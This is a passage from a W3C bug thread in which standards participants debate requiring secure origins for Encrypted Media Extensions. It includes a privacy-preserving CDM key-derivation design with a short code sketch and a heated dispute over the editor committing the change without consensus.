I saw on the public-html-media list that this bug was hoping for input from a wider variety of stakeholders. Let me say that the TAG is strongly in favor of requiring secure origins for any code that interacts with the CDM.

We are working on a formal statement of the various architectural concerns and guiding principles the TAG hopes can be applied to EME [1], which is still undergoing revision and progress and shouldn't really be taken as final yet. But I can say with confidence that we all agree requiring secure origins for CDM-using code is extremely important for security, and that part will not change. See the section at [2] for more details.

[1]: https://github.com/w3ctag/eme/blob/master/EME%20Opinion.md
[2]: https://github.com/w3ctag/eme/blob/master/EME%20Opinion.md#user-facing-concerns
Comment 79 Henri Sivonen 2014-09-18 08:47:32 UTC
(In reply to David Dorwin from comment #77)
> (In reply to Henri Sivonen from comment #70)
> I filed bug 26838 to address some of the vulnerabilities related to initData
> - specifically attacks #13-15.

Thanks.

Regarding earlier concerns about hardware CDMs projecting constant identifiers, it's worth noting that it should be possible to have a hardware CDM with identifier salting even without server-based individualization. That is, addressing the persistent network-exposed identifier problem and the desire to have a hardware CDM that doesn't need supporting individualization server infrastructure after the secrets have been provisioned at the factory are not mutually exclusive.

Here's how:

At the factory, instead of provisioning a per-device instance key (or key pair), provision a per-device instance seed. The seed is just some number (e.g. 128 or 256) of randomly-generated (individually for each device-instance) bits that are embedded in the hardware at the factory. That is, each device instance ends up with a unique (except for extremely improbable collisions) seed that's persistent through the lifetime of the device instance. Let's call this the Device Seed.

Additionally, embed a signing key (RSA, (EC)DSA, Ed25519 or similar), let's call this the Anonymity Set Private Key, into the hardware of multiple device instances. A single Anonymity Set Private Key could be used for all device instances of the same device model or even all device instances of different device models that have the same hardware CDM implementation. The more device instances have the same Anonymity Set Private Key, the better for user privacy, but the more device instances have the same Anonymity Set Private Key, the bigger a DRM robustness problem the compromise of that key becomes.

Embedding the Device Seed and the Anonymity Set Private Key is to be done in a manner that makes it very difficult for these secrets to be extracted from the hardware.

The public key corresponding to the Anonymity Set Private Key, let's call it the Anonymity Set Public Key, is certified (signed) by the root of trust of the DRM scheme (Key System) or by an intermediate key whose certification chains to the root of trust of the DRM scheme. That is, certifications (key signing) performed with the Anonymity Set Private Key can be verified by key servers to chain to the root of trust of the DRM scheme. Alternatively, each key server could have a collection of all the different Anonymity Set Public Keys in circulation to be able to check if a signature is made by a valid Anonymity Set Public Key. This way, there is no need for chaining certifications (signatures) to a root of trust. (Either way, there's a need to distribute information about revoked keys to the key servers, so the system might as well distribute a list of valid keys and omit the PKI hierarchy.)

At runtime, the hardware CDM receives a salt from the browser. Let's call this the Salt. (The CDM doesn't need to know how the salt is generated, but a reasonable policy is for the browser to randomly generate, and then remember until the user asks it to be forgotten, a salt for each combination of EME-using origin and the top-level origin.) The hardware CDM then combines the Device Seed and the Salt to form a Salted Seed. The combination function needs to be deterministic. It could be simply XOR (if the key system never lets the browser see a value that could be reversed to the Salted Seed). It could also be hashing the concatenation of the Salt and the Device Seed (or the Device Seed and the Salt).

The hardware CDM then generates a key to be used for key acquisition. Let's call this a Salted CDM Key. This key could be a secret symmetric key (e.g. AES key), in which case it needs to be encrypted for the key server when sending it over. (If the Salted CDM Key is encrypted for the key server, the browser doesn't see it, so in the simplest case, the function for combining the Device Seed and the Salt could be XOR and the Salted Seed could be Salted CDM Key directly.) Alternatively, the Salted CDM Key could be an RSA public key (of the generated key pair), in which case the Salted Seed would be used as the seed for a CSPRNG used in RSA key generation. Alternatively, the Salted Seed could be converted to an elliptic curve point using Elligator and the Salted CDM Key could be an elliptic-curve Diffie–Hellman public key (of the generated key pair). Or the Salted CDM Key could be derived from the Salted Seed using some other deterministic mechanism.

The CDM then signs the Salted CDM Key using the Anonymity Set Private Key. This signature is sent to the key server so that when the CDM performs key acquisition advertising the Salted CDM Key to the key server, the key server can convince itself that the Salted CDM Key belongs to a CDM that meets the applicable robustness and compliance rules (since it possesses an Anonymity Set Private Key whose corresponding Anonymity Set Public Key the key server considers valid). The content keys are sent by the key server to the CDM using encryption that involves the Salted CDM Key (encrypted using the Salted CDM Key if it is a symmetric key or an RSA public key, or encrypted using a shared secret derived from the Salted CDM Key if it is an (EC)DH public key, etc.)

For maximum robustness, all of the above should happen in tamper-resistant hardware, but to trade off some robustness to gain ease of implementation, any of the above steps could instead be performed in software (normal or inside a TEE).

The notable characteristics are:
 1) The Salted CDM Key is bound to the hardware-bound Device Seed for anti-cloneability.
 2) If the Salt changes, a key server can't correlate the previous Salted CDM Key and the new Salted CDM Key with each other beyond both belonging to devices with the same Anonymity Set Private Key.
 3) The Anonymity Set Private Key enables on-device certification of Salted CDM Keys, so there's no need for server-based individualization.
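
For concreteness, here is a minimal software sketch of the derivation chain described above. The names follow the writeup, but the concrete choices - hashing for the Salted Seed, a symmetric Salted CDM Key, Ed25519 for the anonymity-set signature - are just one selection among the options listed, and a real CDM would do this inside tamper-resistant hardware:

    import hashlib, hmac, os
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

    DEVICE_SEED = os.urandom(32)                 # factory-provisioned, per device
    ANON_SET_KEY = Ed25519PrivateKey.generate()  # shared across many devices

    def salted_cdm_key(salt: bytes) -> bytes:
        # Salted Seed = H(Salt || Device Seed); derive a symmetric Salted CDM
        # Key from it (one of the options described above).
        salted_seed = hashlib.sha256(salt + DEVICE_SEED).digest()
        return hmac.new(salted_seed, b"salted-cdm-key", hashlib.sha256).digest()

    salt = os.urandom(16)       # browser-chosen per (EME origin, top-level origin)
    k = salted_cdm_key(salt)
    sig = ANON_SET_KEY.sign(k)  # on-device certification: proves membership in
                                # the anonymity set, not device identity

    # A fresh salt yields a key the server cannot link to the previous one
    # (beyond anonymity-set membership):
    assert salted_cdm_key(os.urandom(16)) != k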

Inferring PlayReady design from the Defined Terms for Microsoft PlayReady Compliance Rules and Robustness Rules, it seems to me this could be applied to the existing PlayReady key system by making the Anonymity Set Private Key and Anonymity Set Public Key correspond to Device Model Keys and by making the Salted CDM Key correspond to the Device Public Key.
Comment 80 Joe Steele 2014-09-23 14:54:09 UTC
Henri, this is a great writeup of a potential key delivery mechanism. I am confused though about your intent. Are you proposing that this be a mandated mechanism? Or is this being presented as an example of a key delivery architecture that would not require secure origins?
Comment 81 Henri Sivonen 2014-10-06 10:06:02 UTC
(In reply to Joe Steele from comment #80)
> Henri, this is a great writeup of a potential key delivery mechanism. I am
> confused though about your intent. Are you proposing that this be a mandated
> mechanism? Or is this being presented as an example of a key delivery
> architecture that would not require secure origins?

It shows how a key concern behind the proposal to require an authenticated origin *could* be addressed even in hardware without external dependencies (like ongoing maintenance of individualization server infrastructure to support already-shipped devices). While I wish it could be mandated, so far the Task Force has been reluctant to normatively require the DRM to have particular characteristics, so I don't have high hopes for *mandating* stuff. I think the writeup could be used as input to make the suggestions in the Privacy Considerations section more detailed, though.
Comment 82 David Dorwin 2014-10-15 20:51:49 UTC
Unless or until EME normatively requires identifier protection, clearability of identifiers, sandboxing of CDMs, and/or other solutions/mitigations*, we are in a situation where some implementations will be deeply concerning in the areas of privacy and security. The TAG has expressed concern about the security and privacy implications of CDMs, especially on non-secure origins [1].

That leaves us in the situation I described in comment #0: although some implementations may address or mitigate the issues, others will not. The only way to ensure implementations do the right thing *without fragmenting the web platform* is to require secure origins for all implementations.

The remaining question is how to facilitate a smooth transition by content providers that use MSE and thus cannot use mixed content in many user agents.

* Even some mitigations, such as user permissions, are exploitable when using HTTP origins.

[1]: https://github.com/w3ctag/spec-reviews/blob/master/2014/10/eme.md#user-facing-concerns
Comment 83 Bob Lund 2014-10-15 21:22:52 UTC
(In reply to David Dorwin from comment #82)
> Unless or until EME normatively requires identifier protection, clearability
> of identifiers, sandboxing of CDMs, and/or other solutions/mitigations*, we
> are in a situation where some implementations will be deeply concerning in
> the areas of privacy and security. The TAG has expressed concern about the
> security and privacy implications of CDMs, especially on non-secure origins
> [1].
> 
> That leaves us in the situation I described in comment #0: although some
> implementations may address or mitigate the issues, others will not. The
> only way to ensure implementations do the right thing *without fragmenting
> the web platform* is to require secure origins for all implementations.

Wouldn't another alternative be a normative requirement that requests from CDM are encrypted?

> 
> The remaining question is how to facilitate a smooth transition by content
> providers that use MSE and thus cannot use mixed content in many user agents.
> 
> * Even some mitigations, such as user permissions, are exploitable when
> using HTTP origins.
> 
> [1]:
> https://github.com/w3ctag/spec-reviews/blob/master/2014/10/eme.md#user-
> facing-concerns
Comment 84 Joe Steele 2014-10-15 22:00:47 UTC
> Wouldn't another alternative be a normative requirement that requests from
> CDM are encrypted?

With the exception of ClearKey.
Comment 85 David Dorwin 2014-10-15 22:06:55 UTC
(In reply to Bob Lund from comment #83)
> Wouldn't another alternative be a normative requirement that requests from
> CDM are encrypted?

That would be a form of identifier protection, but that can only hope to address a subset of privacy-related concerns. Also, such a requirement would need to be very detailed and prescriptive to ensure the appropriate privacy properties.
Comment 86 Mark Watson 2014-10-16 00:42:45 UTC
This thread, the TAG opinion and David's comment #82 all reflect the fact that there are multiple ways to address the privacy and security risks that have been raised.

We could add additional normative requirements to the specification, though this requires some discussion and may not solve all problems. We could require secure origins, though this also requires some discussion - including of the mixed content problem - and still may not solve all problems.

There may also be some middle ground, where a secure origin is required conditionally, depending on the properties of the CDM.

In practice, in many cases, the CDM and UA implementors together can address the issues raised here without secure origins. In these cases they should not be forced to require a secure origin anyway, given the high cost of such a requirement on content providers.

We could even simply strengthen our security requirements by enumerating the issues and mitigations (including but not limited to secure origins) and requiring that implementations MUST address these: this would already be more than the rest of the web platform - any implementation could have buffer overrun vulnerabilities, for example, and we do not specify how browsers should address this security aspect - we just assume that they do.
Comment 87 Anne 2014-10-16 06:55:18 UTC
(In reply to Mark Watson from comment #86)
> given the high cost of such a requirement on content providers.

I believe this is still under "citation needed". Clearly there are content providers that have managed. With the evolution of HTTP and other new platform features it also seems increasingly unlikely you can avoid the requirement for any serious application.
Comment 88 Mark Watson 2014-10-16 14:52:49 UTC
(In reply to Anne from comment #87)
> (In reply to Mark Watson from comment #86)
> > given the high cost of such a requirement on content providers.
> 
> I believe this is still under "citation needed". Clearly there are content
> providers that have managed. With the evolution of HTTP and other new
> platform features it also seems increasingly unlikely you can avoid the
> requirement for any serious application.

We are running some capacity tests and I will share some figures from those soon. Suffice it to say, for the moment, that the costs associated with simply enabling HTTPS are very significant. A managed migration, at a reasonable pace with time for software and hardware optimizations to be developed and deployed, has a different, lower, cost.

Also, HTTPS is not a panacea and we are looking at - and in some contexts have deployed - other approaches as well.
Comment 89 Joe Steele 2014-10-16 16:28:48 UTC
(In reply to Mark Watson from comment #86)
> We could even simply strengthen our security requirements by enumerating the
> issues and mitigations (including but not limited to secure origins) and
> requiring that implementations MUST address these: this would already be
> more than the rest of the web platform - any implementation could have
> buffer overrun vulnerabilities, for example, and we do not specify how
> browsers should address this security aspect - we just assume that they do.

I agree. 

I think if we specify mechanisms rather than specifying outcomes, we will not end up with the outcomes we want. There is no consensus that the mechanism proposed (SSL/TLS) will address the concerns completely, or that this is the only mechanism that can address the concerns. We have a list of possible attacks and proposed mitigations. I think we would promote better user privacy and better security by adding this information to the spec, normatively if possible.
Comment 90 David Dorwin 2014-10-17 02:43:36 UTC
(In reply to Mark Watson from comment #86)
> This thread, the TAG opinion and David's comment#82 all reflect the fact
> that there are multiple ways to address the privacy and security risks that
> have been raised.
> 
> We could add additional normative requirements to the specification, though
> this requires some discussion and may not solve all problems. We could
> require secure origins, though this also requires some discussion -
> including of the mixed content problem - and still may not solve all
> problems.

I don't think the fact that there may be other problems is an argument against it. HTTPS doesn't solve phishing either, but it's still much better than nothing.

> There may also be some middle ground, where a secure origin is required
> conditionally, depending on the properties of the CDM.
> 
> In practice, in many cases, the CDM and UA implementors together can address
> the issues raised here without secure origins. In these cases they should
> not be forced to require a secure origin anyway, given the high cost of such
> a requirement on content providers.

Unless all content providers support HTTPS, requiring it is not really an option (i.e. "required conditionally") for user agents because it would result in platform segmentation (into HTTPS-requiring and HTTP-allowing clients). Do you have other suggestions on how to allow user agents to require secure origins when necessary without segmenting the platform?

It's also hard to imagine a user agent implementation that supports user permissions yet should not require secure origins (at least for persisted permissions). User agents implementing such permissions over insecure origins give users a false sense of security and privacy, and specs should not imply that this is acceptable. We should not make the same mistake as past permission-related specs.

> We could even simply strengthen our security requirements by enumerating the
> issues and mitigations (including but not limited to secure origins) and
> requiring that implementations MUST address these: this would already be
> more than the rest of the web platform - any implementation could have
> buffer overrun vulnerabilities, for example, and we do not specify how
> browsers should address this security aspect - we just assume that they do.

Hopefully the design of the rest of the web platform does not make it more likely there will be buffer overruns. EME exposes functionality that in many implementations has such security and privacy issues by design. That's very different. This is also one reason I have little confidence that these issues will be adequately addressed in the near future, especially without user agent enforcement of normative requirements.

(In reply to Mark Watson from comment #88)
...
> A managed migration, at a reasonable
> pace with time for software and hardware optimizations to be developed and
> deployed, has a different, lower, cost.

I also mentioned facilitating a smooth transition in comment #82. Do you have suggestions here?

The time it takes for this spec to progress through the process and for this version of it to be implemented and become a large portion of such traffic will naturally delay the impact somewhat. However, we should be clear to application authors and implementors about our intent.

> Also, HTTPS is not a panacea and we are looking at - and in some contexts
> have deployed - other approaches as well.


(In reply to Joe Steele from comment #89)
...
> I think if we specify mechanisms rather than specifying outcomes, we will
> not end up with the outcomes we want. There is no consensus that the
> mechanism proposed (SSL/TLS) will address the concerns completely, or that
> this is the only mechanism that can address the concerns. We have a list of
> possible attacks and proposed mitigations. I think we would promote better
> user privacy and better security by adding this information to the spec,
> normatively if possible.

Do you have suggestions where and how we can (normatively) promote better user privacy and better security in the spec? Regardless of the outcome of this bug, that would be a good thing.
Comment 91 David Dorwin 2014-10-24 16:54:57 UTC
The TAG adopted the following resolution [1] on privacy-sensitive features, a category that EME definitely falls into. Note that the TAG supports changing the behavior of existing APIs even if it breaks some content. As I have said before, we should get it right the first time while we have a chance.

RESOLUTION: We support efforts by browser vendors to restrict privacy-sensitive features to secure origins. This includes ones that have not historically been restricted as such, like geolocation or webcam access.
We also support investigation into ways of preventing these features from leaking to third-party scripts within a webpage (although the exact technology to do so is unclear as yet, probably involving some combination of CSP and/or something like ).
We appreciate this could cause some short and medium-term pain (breaking some existing content), and so this needs to be done with care, but it is a worthy goal to aspire to. 
 
[1] https://github.com/w3ctag/meetings/blob/gh-pages/2014/sept29-oct1/09-29-f2f-minutes.md
Comment 92 David Dorwin 2014-10-24 16:59:05 UTC
The current text is insufficient from a security and privacy perspective. Requiring a secure origin mitigates many different issues and addresses both the TAG's resolution and spec review feedback. In all the discussion over the last three months, there have been no proposals for concrete alternatives that address as many issues or can definitely be enacted in all implementations. It is also possibly the only mitigation that can be implemented entirely within the user agent.

Rather than saying EME shouldn't require a secure origin because it might be possible to implement a CDM that doesn't have these concerns, we should require it unless normative requirements that sufficiently address the concerns are defined and met.

I am going to implement the secure origin requirement for now. We can continue discussing potential mitigations for content providers. (I've started a discussion at http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0079.html.) If we come up with normative solutions or exceptions, we can consider removing the absolute requirement. If you have specific ideas for addressing the security and/or privacy concerns OR the impact on content providers, please start a thread or file a bug.
Comment 93 David Dorwin 2014-10-24 17:11:11 UTC
https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 adds the check.
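
(For illustration only, a sketch of what this check looks like to an application on an insecure origin, assuming the promise-based MediaKeys.create() entry point discussed in this bug; the stand-in name and key system string below are hypothetical:)

```ts
// Stand-in declaration for the draft's MediaKeys object (named
// MediaKeysDraft here only to keep the sketch self-contained).
declare const MediaKeysDraft: { create(keySystem: string): Promise<unknown> };

MediaKeysDraft.create("com.example.drm").catch((e: DOMException) => {
  if (e.name === "NotSupportedError") {
    // On an unauthenticated (e.g. HTTP) origin the promise is rejected
    // before any CDM is involved; the page must move to HTTPS to use EME.
  }
});
```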
Comment 94 Mark Watson 2014-10-24 17:22:06 UTC
There is clearly no consensus to require secure origins.

The text as it now is will certainly cause a Formal Objection, from us at least.

I appreciate that it's useful for Editors to have the flexibility to implement proposals that have not yet gained consensus, for the purpose of driving towards resolution of uncontroversial issues.

However, I strongly object to a process in which specification changes are made on highly contentious issues in the absence of consensus.

This is a difficult and complex topic and we should approach it collaboratively. Please revert the change so that we can do that.
Comment 95 Glenn Adams 2014-10-24 18:03:37 UTC
(In reply to Mark Watson from comment #94)
> There is clearly no consensus to require secure origins.
> 
> The text as it now is will certainly cause a Formal Objection, from us at least.
> 
> I appreciate that it's useful for Editors to have the flexibility to
> implement proposals that have not yet gained consensus, for the purpose of
> driving towards resolution of uncontroversial issues.
> 
> However, I strongly object to a process in which specification changes are
> made on highly contentious issues in the absence of consensus.
> 
> This is a difficult and complex topic and we should approach it
> collaboratively. Please revert the change so that we can do that.

I concur with Mark.
Comment 96 Joe Steele 2014-10-24 18:07:50 UTC
I also agree with Mark and Glenn.
Comment 97 David Dorwin 2014-10-24 18:25:22 UTC
(In reply to Mark Watson from comment #94)
> There is clearly no consensus to require secure origins.

And the discussion was going nowhere - many of the arguments opposing a secure origin requirement were based on hope and theoretical possibilities rather than the properties of real DRM implementations. Maybe changing the baseline will help drive a productive conversation about how to address the underlying concerns while allowing user agents to do what they believe is the right thing for their users.

> The text as it now is will certainly cause a Formal Objection, from us at least.

The Formal Objection will be considered by the Director, who is also a member of the TAG. On the other hand, not requiring a secure origin may have likewise caused a Formal Objection from others, including the TAG, and resulted in EME not being allowed to progress forward in the spec process because it had not addressed the concerns of the TAG.

Your statement actually gives us a good point of reference. Short of completely removing the new step, what mitigations would cause you not to object?

> I appreciate that it's useful for Editors to have the flexibility to
> implement proposals that have not yet gained consensus, for the purpose of
> driving towards resolution of uncontroversial issues.
> 
> However, I strongly object to a process in which specification changes are
> made on highly contentious issues in the absence of consensus.
> 
> This is a difficult and complex topic and we should approach it
> collaboratively. Please revert the change so that we can do that.

This one-line change does not prevent collaboration, but it does fix a security and privacy problem with the spec and bring it in line with the TAG's direction, which in turn brings it closer to moving forward in the spec process. It also allows us to start considering exceptions rather than going around in circles and making no progress. Unfortunately, there have been no concrete proposals suggested in the three months this bug has been open nor suggestions for addressing concerns - even when I explicitly requested them in comment #90. If this one-line change helps drive the discussion forward, then that is a good thing. (It appears to already have had such an effect: http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0081.html.)
Comment 98 Mark Watson 2014-10-24 18:30:47 UTC
(In reply to David Dorwin from comment #97)
> (In reply to Mark Watson from comment #94)
> > This is a difficult and complex topic and we should approach it
> > collaboratively. Please revert the change so that we can do that.
> 
> This one-line change does not prevent collaboration.

It does, because such non-consensual pre-emptive changes on a controversial topic completely undermine confidence that investing in collaboration is likely to be productive.

> http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0081.html.

That was in response to a long-standing commitment I made to provide such data before TPAC and had nothing to do with your change.
Comment 99 Bob Lund 2014-10-24 18:34:53 UTC
(In reply to Joe Steele from comment #96)
> I also agree with Mark and Glenn.

+1
Comment 100 Glenn Adams 2014-10-24 18:48:44 UTC
(In reply to David Dorwin from comment #97)
> This one-line change does not prevent collaboration, but it does fix a
> security and privacy problem with the spec and bring it in line with the
> TAG's direction, which in turn brings it closer to moving forward in the
> spec process.

The TAG's input is just input. It doesn't mean that we must follow it. Given the significant opposition to the "one line change", it would be best to remove it until there is WG consensus on how to proceed. As editor, you serve at the behest of the WG.
Comment 101 David Dorwin 2014-10-24 21:57:12 UTC
(In reply to Glenn Adams from comment #100)
> (In reply to David Dorwin from comment #97)
> > This one-line change does not prevent collaboration, but it does fix a
> > security and privacy problem with the spec and bring it in line with the
> > TAG's direction, which in turn brings it closer to moving forward in the
> > spec process.
> 
> The TAG's input is just input. It doesn't mean that we must follow it. Given
> the significant opposition to the "one line change", it would be best to
> remove it until there is WG consensus on how to proceed. As editor, you
> serve at the behest of the WG.

The significant opposition is from a few people and is not necessarily representative of the WG. There has also been strong support for such a change.

I considered input from the TAG, WG, and other W3C members and updated the text in the Editor's Draft. This is consistent with the HTML WG's Real Work Modes (https://www.w3.org/wiki/HTML/wg/WorkMode#Editors). WG consensus will not be required unless/until the WG formally publishes the specification as a Last Call Working Draft. Hopefully we can address some of the concerns before then.


I committed https://dvcs.w3.org/hg/html-media/rev/be9998cf708c to add an issue box referencing this bug and the open questions.
Comment 102 Glenn Adams 2014-10-24 22:28:24 UTC
(In reply to David Dorwin from comment #101)
> (In reply to Glenn Adams from comment #100)
> > (In reply to David Dorwin from comment #97)
> > > This one-line change does not prevent collaboration, but it does fix a
> > > security and privacy problem with the spec and bring it in line with the
> > > TAG's direction, which in turn brings it closer to moving forward in the
> > > spec process.
> > 
> > The TAG's input is just input. It doesn't mean that we must follow it. Given
> > the significant opposition to the "one line change", it would be best to
> > remove it until there is WG consensus on how to proceed. As editor, you
> > serve at the behest of the WG.
> 
> The significant opposition is from a few people and is not necessarily
> representative of the WG.

It is certainly representative of the majority of the TF members.

> There has also been strong support for such a
> change.
> 
> I considered input from the TAG, WG, and other W3C members and updated the
> text in the Editor's Draft. This is consistent with the HTML WG's Real Work
> Modes (https://www.w3.org/wiki/HTML/wg/WorkMode#Editors). WG consensus will
> not be required unless/until the WG formally publishes the specification as
> a Last Call Working Draft. Hopefully we can address some of the concerns
> before then.
> 
> 
> I committed https://dvcs.w3.org/hg/html-media/rev/be9998cf708c to add an
> issue box referencing this bug and the open questions.

That is not adequate. Please remove the text from step 3:

If the origin of the calling context's Document is not an authenticated origin [MIXED-CONTENT], return a promise rejected with a new DOMException whose name is NotSupportedError.

If you want, you can replace it with "[TBD]" and move the removed text to the Issue, with the preceding remark: "The editor proposes adding ...".

If you cannot do this, then I will be happy to submit a formal process objection to the chair.
Comment 103 Mark Watson 2014-10-25 00:41:41 UTC
(In reply to David Dorwin from comment #101)
> (In reply to Glenn Adams from comment #100)
> > (In reply to David Dorwin from comment #97)
> > > This one-line change does not prevent collaboration, but it does fix a
> > > security and privacy problem with the spec and bring it in line with the
> > > TAG's direction, which in turn brings it closer to moving forward in the
> > > spec process.
> > 
> > The TAG's input is just input. It doesn't mean that we must follow it. Given
> > the significant opposition to the "one line change", it would be best to
> > remove it until there is WG consensus on how to proceed. As editor, you
> > serve at the behest of the WG.
> 
> The significant opposition is from a few people and is not necessarily
> representative of the WG. There has also been strong support for such a
> change.
> 
> I considered input from the TAG, WG, and other W3C members and updated the
> text in the Editor's Draft. This is consistent with the HTML WG's Real Work
> Modes (https://www.w3.org/wiki/HTML/wg/WorkMode#Editors). WG consensus will
> not be required unless/until the WG formally publishes the specification as
> a Last Call Working Draft. Hopefully we can address some of the concerns
> before then.

As a co-editor, the way I interpret that process is that _ultimately_ we are operating on a consensus-based model (as distinct from the WHATWG process, for example). That means that, pragmatically, there is no point in making changes which are known to be highly controversial since it serves only to annoy people and thus stall progress. It's at least disrespectful to the goal of consensus-building.

I have no interest in participating in a standardization process that is not ultimately consensus-based - that's an oxymoron as recognized at open-stand.org.

Also as a co-editor, I guess I could just revert it myself, but commit wars are silly. Best not to start them.

Regarding the TAG opinion, as well as being just that and being worded as a recommendation, it was clearly conditional: "To the extent that privacy-invasive or security-compromising features can be normatively disallowed, EME should do so. _To the extent that they cannot be_, e.g. for robustness reasons, we _should_ restrict access to those features such that they can only be used from secure origins".

So, to truly follow their recommendation we would need to determine the extent to which privacy-invasive and security-compromising features can be normatively disallowed before we could conclude on the circumstances in which a secure origin restriction provides value.

Furthermore, recent discussion on the TAG list suggests perhaps they have not actually fully absorbed the work we have already done on privacy and security. They also say, elsewhere '... privacy-sensitive features, a category that EME definitely falls into...' suggesting they have not understood at all the conditions under which EME is no more privacy-sensitive than cookies.

> 
> 
> I committed https://dvcs.w3.org/hg/html-media/rev/be9998cf708c to add an
> issue box referencing this bug and the open questions.

That's not sufficient. Please revert the change and we can continue the technical discussion. I actually thought we were starting to make some progress.
Comment 104 David Dorwin 2014-10-25 02:16:04 UTC
(In reply to Mark Watson from comment #103)
> Regarding the TAG opinion, as well as being just that and being worded as a
> recommendation, it was clearly conditional: "To the extent that
> privacy-invasive or security-compromising features can be normatively
> disallowed, EME should do so. _To the extent that they cannot be_, e.g. for
> robustness reasons, we _should_ restrict access to those features such that
> they can only be used from secure origins".

It is more than an opinion - it is a spec review adopted by the TAG. Note its new location [1].

I'm not sure why you added emphasis to "should." That is the English word "should", not RFC "SHOULD", and refers to the W3C, not user agents.

> So, to truly follow their recommendation we would need to determine the
> extent to which privacy-invasive and security-compromising features can be
> normatively disallowed before we could conclude on the circumstances in
> which a secure origin restriction provides value.

We have identified broad privacy-invasive and security-compromising issues/functionality/features that are not currently normatively disallowed. Since those privacy-invasive and security-compromising issues and features are not normatively addressed and disallowed, respectively, we should restrict access to secure origins.

Despite repeated requests, there have been no concrete proposals (other than Clear Key and intranets, which are currently being discussed [2]) for normative definitions of features or circumstances for which a secure origin restriction does not provide value. How long should we have waited before fixing the privacy and security holes in the spec? The longer we wait, the more difficult it will be for everyone to adapt and the more vulnerable implementations will ship.

> Furthermore, recent discussion on the TAG list suggests perhaps they have
> not actually fully absorbed the work we have already done on privacy and
> security. They also say, elsewhere '... privacy-sensitive features, a
> category that EME definitely falls into...' suggesting they have not
> understood at all the conditions under which EME is no more
> privacy-sensitive than cookies.

What work have we done on privacy and security? The non-normative considerations sections? Those have not received much attention when or since you wrote them, and there is still an issue in the spec stating they are incomplete. Regardless, they are not a replacement for normative text.

The text you quoted was mine from comment 91, not the TAG resolution, which begins with the word "RESOLUTION."

Your assertion that "In practice there's no reason for EME in browsers to be any more privacy sensitive than regular cookies" [3] (or that this is even likely to be true for a majority of implementations) has been debunked in the www-tag thread [4].
The focus on theoretical possibilities and apparent unwillingness to address real concerns presented by real implementations has been a major hurdle to progress on this issue. I understand that some people are strongly opposed to requiring secure origins, but we cannot continue to stick our heads in the sand and hope for a good outcome on important security and privacy issues.


[1] https://github.com/w3ctag/spec-reviews/blob/master/2014/10/eme.md
[2] http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0085.html
[3] http://lists.w3.org/Archives/Public/www-tag/2014Oct/0081.html
[4] http://lists.w3.org/Archives/Public/www-tag/2014Oct/thread.html#msg77
Comment 105 Glenn Adams 2014-10-25 03:55:06 UTC
(In reply to David Dorwin from comment #104)
> We have identified broad privacy-invasive and security-compromising
> issues/functionality/features that are not currently normatively disallowed.
> Since those privacy-invasive and security-compromising issues and features
> are not normatively addressed and disallowed, respectively, we should
> restrict access to secure origins.

That is an absurd statement. Cookies suffer the same problem. Does that mean they should be restricted to secure origins?


> 
> Despite repeated requests, there have been no concrete proposals (other than
> Clear Key and intranets, which are currently being discussed [2]) for
> normative definitions of features or circumstances for which a secure origin
> restriction does not provide value.

Nobody is saying it can't potentially provide value. But value comes at a cost, and there is an apparent majority in this TF that is saying the cost is greater than the value within the near term.

> How long should we have waited before
> fixing the privacy and security holes in the spec?

Nobody is saying don't fix them. They are saying that the proposed fix is impractical for at least some period of time, probably greater than one year in duration. Should that hold up the work? No.


> The longer we wait, the
> more difficult it will be for everyone to adapt and the more vulnerable
> implementations will ship.

Implementations change all the time. So do specs. Even those of us who want to see concrete, fixed RECs understand this thing called versions. I'm sure you do. Perhaps EME1 can't and won't require security origins. Perhaps EME2 will.

The point is that it is necessary to build a consensus, and not simply adopt a controversial position that discards the positions of the TF members. As editor, you do not have that authority. If you want to have your position adopted, you need to work in the accepted process, which may be to perform a CfC within the TF and then the WG on this point. However, by pursuing this point the way you are, you are creating an unnecessarily tense and adverse working environment in this TF.

Please revert the recent change, then bring your position to the TF using standard process in order to further discuss. The longer you delay doing this, the more ill will you are generating.
Comment 106 Domenic Denicola 2014-10-25 04:54:37 UTC
(In reply to Mark Watson from comment #103)

> Furthermore, recent discussion on the TAG list suggests perhaps they have
> not actually fully absorbed the work we have already done on privacy and
> security. They also say, elsewhere '... privacy-sensitive features, a
> category that EME definitely falls into...' suggesting they have not
> understood at all the conditions under which EME is no more
> privacy-sensitive than cookies.

I categorically reject this characterization of our spec review and find it insulting.
Comment 107 Mark Watson 2014-10-25 16:11:42 UTC
(In reply to Domenic Denicola from comment #106)
> (In reply to Mark Watson from comment #103)
> 
> > Furthermore, recent discussion on the TAG list suggests perhaps they have
> > not actually fully absorbed the work we have already done on privacy and
> > security. They also say, elsewhere '... privacy-sensitive features, a
> > category that EME definitely falls into...' suggesting they have not
> > understood at all the conditions under which EME is no more
> > privacy-sensitive than cookies.
> 
> I categorically reject this characterization of our spec review and find it
> insulting.

I'm sorry, that was not my intention.

Let me restate my point in more factual terms:
- identifiers and EME are a complex topic; there are many different possible scenarios
- we address these scenarios and give mitigations in our security and privacy considerations, added under bug 22910 [1] about a year ago. We noted that further review is expected.
- the TAG opinion does not go into details regarding different identifier properties; it gives a blanket, though conditional, recommendation for secure origins
- an author of the TAG opinion said 'individualization is not an area we looked in to very much' [2],
- the same author expressed concern (and perhaps surprise) at the prospect of EME identifiers being used as 'ubercookies' and suggested mitigations which are already in the EME document [3]

We would welcome detailed feedback from TAG about the privacy section of the document and particularly the normative strength of the mitigations.

By the way, requiring secure origins does not address the problem of ubercookies, as Henri pointed out.


[1] https://www.w3.org/Bugs/Public/show_bug.cgi?id=22910
[2] http://lists.w3.org/Archives/Public/www-tag/2014Oct/0080.html
[3] http://lists.w3.org/Archives/Public/www-tag/2014Oct/0106.html
Comment 108 Ryan Sleevi 2014-10-27 00:52:41 UTC
(In reply to Glenn Adams from comment #105)
> (In reply to David Dorwin from comment #104)
> > We have identified broad privacy-invasive and security-compromising
> > issues/functionality/features that are not currently normatively disallowed.
> > Since those privacy-invasive and security-compromising issues and features
> > are not normatively addressed and disallowed, respectively, we should
> > restrict access to secure origins.
> 
> That is an absurd statement. Cookies suffer the same problem. Does that mean
> they should be restricted to secure origins?
> 

